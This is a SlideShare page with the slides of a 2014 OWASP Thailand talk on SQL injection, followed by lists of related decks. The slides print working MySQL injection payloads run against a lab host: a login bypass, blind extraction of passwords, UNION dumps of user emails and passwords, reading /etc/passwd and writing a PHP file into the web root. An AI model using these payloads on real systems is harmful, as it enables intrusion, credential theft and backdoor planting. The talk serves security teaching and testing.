SlideShare une entreprise Scribd logo

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

P
Pichaya Morimoto

Topic: SQL Injection 101 : It is not just about ' or '1'='1 Speaker: Pichaya Morimoto Event: OWASP Thailand Meeting 3/2014 Date: Auguest 28, 2014

Logiciels
1  sur  45
Télécharger pour lire hors ligne
SQL Injection 101 It is not just about ' or '1'='1 pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
Overview ★ Anatomy of SQL Injection Attack ★ Injection Techniques ○ B-E-T-U-S ★ Privilege Escalation ○ File & RCE ★ Advanced Attacks ★ Case Studies
What is SQL Injection “A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.” - https://www.owasp.org/index.php/SQL_Injection Web Application User inject a specially crafted SQL as input to manipulate results Application Users via client programs Input Entry Points (Search box, Forms, Article ID, Session ID, HTTP headers etc.) Database
Very Popular among Hackers
Impact on SQL Injection In general, consider SQL Injection a high impact severity. Technical Impacts Business Impacts ★ Data losses ★ Bypass Authentications ★ Denial of access ★ Lead to host takeover ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed? * https://www.owasp.org/index.php/Top_10_2013-A1-Injection * https://www.owasp.org/index.php/SQL_Injection
Exploitation Complexity 95% 4% 1% Very Hard Lunatic Easy (Required an Expert) (Maze queries, 2nd order, Blind, Complex App Logic, Bypass Filters/WAF etc.) SQL injection with Havij by 3 year old
A Ton of Tools ★ Automated SQL injection Tools SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc. ★ Web Vulnerability Scanner ○ Commercial Acunetix, Netsparker, IBM AppScan,HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc. ○ Free W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
Tool == Super Easy ?
Tool == Super Easy ?
Tools there, why learn to SQLi? 1. When tools failed to exploit? 2. False Positive ★ Complex Database Query ★ Complex Application Logic ★ Encodings & Blacklist Filters ★ Post Authen-ed ★ Anti-CSRF Token ★ Non-SELECT statements ★ Programmer is so indy 3. It’s just fun, and sometimes can make good money... In case you are penetration tester, or just a Zero-day hunter ;) Popular websites already scanned by those available tools. It is very challenge, if you can find flaws that overlooked by tools.
Quote from a Hacker “แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ แฮกเว็บได้ 1,000 เว็บ แต่เป็น แฮกเกอร์ที่แฮกเว็บเดิมได้ 1,000 ครั้ง โดยที่โดน แพทช์ไปแล้วทุกครั้ง” ตาเล็ก Windows98SE
SQL Injection Techniques 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
Boolean-based blind technique ★ Inject SQL string to control result to be TRUE or FALSE using boolean algebra ★ You can determine whether T/F based on analysis of HTTP responses (string/regex/page length/HTTP status) ★ Retrieve arbitrary data: ○ Sub-Queries with “SELECT” + Conditions (CASE-WHEN, IF-THEN)
Example of Vulnerable Code User Input TITLE insert into SQL query TRUE case : title = naruto FALSE case : title = abc123
Boolean-based blind : Probe ★ title = naruto SQL : SELECT * FROM bookshop WHERE title='naruto' Result : found (TRUE) ★ title = abc123 SQL : SELECT * FROM bookshop WHERE title='abc123' Result : not found (FALSE) ★ title = naruto' and '1'='1 SQL : ..WHERE title='naruto' and '1'='1' Result : found (TRUE) ★ title = naruto' and 1=2-- - SQL : ..WHERE title='naruto' and 1=2-- -' Result : found (FALSE) Insert another TRUE condition connected with ‘AND’ operator MySQL comments -- - # /**/ T & T = T T & F = F
Boolean-based blind : Exploit ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - Result: not found (FALSE) ★ title=naruto' and 'cat'= (if(database()='owasp_db','cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='a','cat','dog'))-- - Result: not found (not starts with ‘a’) … b … c ... ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='o','cat','dog'))-- - MySQL IF function IF( <condition>, <return when TRUE>, <return when FALSE> ) MySQL substring functions 1. SUBSTRING (str, pos, len) 2. SUBSTR (str, pos, len) 3. MID(str, pos, len) Result: found (starts with ‘o’), then go to next character.
Example of Vulnerable Code $email=$_POST['email']; $password=$_POST['password']; $sql="SELECT * FROM users WHERE (email='$email')"; $sql.=" AND (password='$password')"; $result = mysql_query($sql); if(mysql_num_rows($result)){ die(header('location: member.php')); }else{ die(header('HTTP/1.0 401 Unauthorized')); } True (Login successful) HTTP/1.1 302 Found location: member.php False (Login failed) HTTP/1.0 401 Unauthorized Unvalidated User Input Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" … WHERE (email='a') AND (password='')||(2>'1') Always TRUE
Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Char Pos : 1 password=1' or from first record of password column 2>(if(mid((select password from users),1,1)='b',1,3))-- - HTTP/1.0 401 Unauthorized ... password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- - HTTP/1.1 302 Found location: member.php If Char Pos 1 equals to ‘a’ then return 1, otherwise return 3 When result is in TRUE case that means 1st char is current value ( ‘t’ )
Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Go To next Repeat steps until you character get all text from the results! Tip: Find length(<query>)
Boolean-based blind : Exploit Look for automate way ? if the flaw is not too complicate then we can just switch to SQLMap. But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular Expression search
Error-based : Concept ★ Inject specially crafted invalid SQL syntax ★ Ideally, force web application to expose Error Message which contains the injection results ★ Methods depend solely on DBMS ★ Rarely found in production webapps
Example of Vulnerable Code function search_book($title){ global $con; $sql = "SELECT * FROM bookshop WHERE title='".$title."'"; $result = mysql_query($sql) or die(mysql_error($con)); if(mysql_num_rows($result)){ return 'found'; }else{ return 'not found'; } Show Database Error Message when query result in an error } $book_title = $_GET['title']; $book_status = search_book($book_title); echo '<h1>Result: '.$book_status.'</h1>';
Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- - Caution Error messages has limit number of allowed length, so what? length() + mid() ;)
Time-based blind : Concept ★ Inject valid SQL string to ○ wait for few seconds in TRUE conditions and … ○ longer/shorter delay for FALSE ★ Analysis on response time to determine the result of queries ★ Take long time to get result but very useful to hack completely blind flaws
Example of Vulnerable Code
Time-based blind : Exploit newbook.php?title=aaa&author=bbb'+ if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1)) >108,sleep(5),sleep(10)))-- -') TRUE case : sleep(5) , delay 5 seconds FALSE case : sleep(10), delay 10 seconds Delay 5 seconds
Time-based blind : Exploit Write a script to automate the attack ! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
Time-based blind : Exploit sleep() executed !
UNION query-based : Concept ★ Most popular method found in SQL injection tutorials from Google/YouTube ★ Inject valid SQL string by making the left-side SELECT to be false and then insert “UNION” with another right-side SELECT query using same number of columns contain what you want to fetch.
Example of Vulnerable Code Unvalidated parameter ‘author’ pass into SQL query
UNION query-based : Exploit Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - There are column no. 1 - 4 in underlying SELECT query There is no 5th column. If db error msg on, u will see: Unknown column '5' in 'order clause'
UNION query-based : Exploit Step 2.1 : We do not need result from 1st SELECT SQL query so discard it with ‘always FALSE’ condition. http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - Step 2.2 : Insert 2nd SELECT SQL query separated by UNION http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- - Result of “SELECT 1,2,3,4” will replace where the result of 1st SELECT was.
UNION query-based : Exploit Exploit : http://owasp-sqli. local/showbook.php ?author=longcat' and 1>2 union select user(),database(),version(), (select group_concat(email, password) from users)--+- Tips: Database Meta Data select database() select table_name from information_schema.tables select column_name from information_schema.columns
Stacked Queries : Concept ★ Append another query into the injection ★ Not All DBMS drivers/API support stacked queries ★ Very Effective for MS-SQL, SQLite Attack Scenario: User Input = 123 SQL: SELECT email FROM users where id=123 User Input = 456; DROP table users SQL: ... users where id=456; DROP table users
Example of Vulnerable Code
Stacked queries : Exploit
Privilege Escalation ★ Read credential from configuration files ★ Create Accessible Web Backdoor ★ Arbitrary OS command execution
SQL Injection : Read File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
SQL Injection : Write File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
SQL Injection : OS CMD Shell 1. Write File > Web Backdoor ( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 2. Built-in OS command functions / UDF MS-SQL xp_cmdshell
Advanced Attacks ★ MySQL Second Order SQL Injection ★ Abusing PHP PDO prepared statements ★ Making a Backdoor with SQLite ★ How a hashed string causes SQL Injection flaw ★ Account Takeover with SQL Truncation Attack ★ CodeIgniter Active Record Bypass
Next Time :s
Thanks! Need More? Good Resources https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) https://www.owasp.org/index.php/Blind_SQL_Injection http://websec.ca/kb/sql_injection https://github.com/sqlmapproject/sqlmap http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 Build your own SQL Injection Playground https://github.com/SpiderLabs/MCIR/tree/master/sqlol https://github.com/Audi-1/sqli-labs https://github.com/sqlmapproject/testenv https://www.owasp.org/index. php/OWASP_Broken_Web_Applications_Project https://pentesterlab.com/exercises/web_for_pentester/ https://pentesterlab.com/exercises/from_sqli_to_shell_II/ https://pentesterlab. com/exercises/from_sqli_to_shell_pg_edition/

Recommandé

SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 

Recommandé

SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql injection
Sql injectionSql injection
Sql injectionSasha-Leigh Garret
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionMarios Siganos
 

Contenu connexe

Tendances

Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 

Tendances (20)

Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Sql injection
Sql injectionSql injection
Sql injection
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the Hood
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 

En vedette

Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Pichaya Morimoto
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Pichaya Morimoto
 
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesFrom Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesPichaya Morimoto
 
[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyal[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyalYode Arliando
 
SQL Injection dan XSS
SQL Injection dan XSSSQL Injection dan XSS
SQL Injection dan XSSYode Arliando
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesPichaya Morimoto
 
Threat modeling librarian freedom conference
Threat modeling librarian freedom conferenceThreat modeling librarian freedom conference
Threat modeling librarian freedom conferenceevacide
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 

En vedette (19)

Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101
 
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutesFrom Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutes
 
[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyal[Jarkom] Teknik penyaluran sinyal
[Jarkom] Teknik penyaluran sinyal
 
SQL Injection dan XSS
SQL Injection dan XSSSQL Injection dan XSS
SQL Injection dan XSS
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Exploiting Blind Vulnerabilities
Exploiting Blind VulnerabilitiesExploiting Blind Vulnerabilities
Exploiting Blind Vulnerabilities
 
Threat modeling librarian freedom conference
Threat modeling librarian freedom conferenceThreat modeling librarian freedom conference
Threat modeling librarian freedom conference
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internals
 
SQL injection
SQL injectionSQL injection
SQL injection
 

Similaire à SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampFelipe Prado
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQLHung-yu Lin
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupJanith Malinga
 
Simple web security
Simple web securitySimple web security
Simple web security裕夫 傅
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Hongyang Wang
 

Similaire à SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto (20)

DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
 
Sql injection
Sql injectionSql injection
Sql injection
 
Hack through Injections
